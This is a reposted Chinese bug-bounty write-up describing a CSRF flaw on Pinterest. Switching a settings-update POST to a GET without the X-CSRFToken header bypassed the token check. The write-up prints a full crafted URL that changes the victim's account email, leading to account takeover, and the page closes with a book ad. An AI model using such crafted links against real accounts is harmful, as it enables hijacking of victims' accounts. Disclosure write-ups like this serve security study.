第十八篇:CSRF导致账号接管

栏目: 编程工具 · 发布时间: 5年前

内容简介:当浏览”1)首先,我将POST请求中的”X-CSRFToken”头删掉,然后通过burpsuit转发,服务器响应error “/resource/UserSettingsResource/update/ didn’t finish after 8 seconds”,这意味着CSRF令牌正在进行验证2)然后,我将上面的POST请求更改为GET请求,同样删掉”X-CSRFToken”,转发之后我得到响应”200 ok”

哪里有BUG??

  当浏览” https://www.pinterest.com"时,我发现CSRF tokens是通过http头”X-CSRFToken”传递的,所以正常情况下要验证CSRF token的话,请求如下所示:

POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1
Host: www.pinterest.com
Content-Type: application/x-www-form-urlencoded
X-CSRFToken: <CSRF Token>
……..
……..
<POST Parameters>

1)首先,我将POST请求中的”X-CSRFToken”头删掉,然后通过burpsuit转发,服务器响应error “/resource/UserSettingsResource/update/ didn’t finish after 8 seconds”,这意味着CSRF令牌正在进行验证

2)然后,我将上面的POST请求更改为GET请求,同样删掉”X-CSRFToken”,转发之后我得到响应”200 ok”

账号接管

  这是一个基于GET请求的CSRF,我们需要做的仅仅是制作一个URL链接,将所有通过POST传递的参数通过GET请求进行传递(不是所有程序都接受这种方法,大家可以通过burpsuit自带的”change request method”来转换)

https://www.pinterest.com/_ngjs/resource/UserSettingsResource/update/?source_url=%2Fsettings%2F&data=%7B%22options%22%3A%7B%22impressum_url%22%3Anull%2C%22last_name%22%3A%22dummy%22%2C%22custom_gender%22%3Anull%2C%22locale%22%3A%22en-US%22%2C%22has_password%22%3Atrue%2C%22email_settings%22%3A%22Everything+%28except+emails+you%27ve+turned+off%29%22%2C%22news_settings%22%3A%22Activity+from+other+people+on+Pinterest%22%2C%22id%22%3A%22%22%2C%22is_write_banned%22%3Afalse%2C%22first_name%22%3A%22dummyuser%22%2C%22push_settings%22%3A%22Everything+%28except+push+you%27ve+turned+off%29%22%2C%22personalize_from_offsite_browsing%22%3Atrue%2C%22facebook_timeline_enabled%22%3Afalse%2C%22email_changing_to%22%3Anull%2C%22personalize_nux_from_offsite_browsing%22%3Afalse%2C%22is_tastemaker%22%3Afalse%2C%22type%22%3A%22user_settings%22%2C%22email%22%3A%22anytestemail%40user.com%22%2C%22website_url%22%3A%22%22%2C%22location%22%3A%22%22%2C%22username%22%3A%22dummyuser%22%2C%22pfy_preference%22%3Atrue%2C%22facebook_publish_stream_enabled%22%3Afalse%2C%22email_bounced%22%3Afalse%2C%22is_partner%22%3Anull%2C%22ads_customize_from_conversion%22%3Atrue%2C%22additional_website_urls%22%3A%5B%5D%2C%22about%22%3A%22test%22%2C%22gender%22%3A%22male%22%2C%22age%22%3Anull%2C%22exclude_from_search%22%3Afalse%2C%22birthdate%22%3Anull%2C%22show_impressum%22%3Afalse%2C%22email_biz_settings%22%3A%22Everything+%28includes+announcements%2C+expert+tips%2C+creative+ideas%2C+and+more%29%22%2C%22country%22%3A%22IN%22%2C%22hide_from_news%22%3Afalse%2C%22collaborative_boards%22%3A%5B%5D%7D%2C%22context%22%3A%7B%7D%7D

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Data Structures and Algorithms in Java

Data Structures and Algorithms in Java

Michael T. Goodrich、Roberto Tamassia / Wiley / 2010-01-26 / USD 177.41

* This newest edition examines fundamental data structures by following a consistent object-oriented framework that builds intuition and analysis skills of data structures and algorithms * Presents ne......一起来看看 《Data Structures and Algorithms in Java》 这本书的介绍吧!

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具